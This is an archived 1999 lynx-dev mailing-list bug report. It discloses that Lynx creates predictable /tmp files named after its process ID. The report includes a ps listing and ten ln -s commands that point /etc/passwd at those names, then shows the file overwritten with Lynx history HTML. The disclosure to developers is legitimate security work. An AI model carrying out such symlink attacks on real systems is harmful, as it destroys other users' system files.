lynx-dev
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

lynx-dev Bug in lynx...

From: Juan Diego
Subject: lynx-dev Bug in lynx...
Date: Mon, 8 Feb 1999 22:58:43 +0500 (GMT) 
Hello....

I have found a bug in Lynx all versions...

lynx create temporary files in /tmp in this way....


L[num proc]-xTMP.html

where 

[num proc] is the proc number in the machine
x is a number form 0 to 9

if i run lynx like any user, for example root we see this

earthworm:~$ ps
  PID TTY STAT  TIME COMMAND
   91   1 SW   0:06 (bash)
   94   4 S    0:05 -bash 
   95   5 SW   0:06 (bash)
 3867  a3 S    0:00 pppd -detach defaultroute crtscts modem 192.168.2.6: 
 3870   3 SW   0:02 (ssh)
 3894   4 T    0:00 lynx 
 3898   4 R    0:00 ps 

then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

if i make a symlink 
form any of it to any file in the system, for example....


earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd  L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-9TMP.html

and now root (in this example) try to download a file, or press the
backspace key to reach the history list, the file i have linked (in this
case /etc/passwd) will be replaced with it... 

for example i got this in my system

earthworm:/tmp$ cat /etc/passwd

<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
  <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently 
Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>


like you see, the file is lost now... 

i hope this can help you to improve lynx.

I'll post this tomorrow to the bugtraq list, but first the developers...

keep that great work with lynx, i really like it....

by..

Juan Diego
reply via email to
[Prev in Thread] Current Thread [Next in Thread]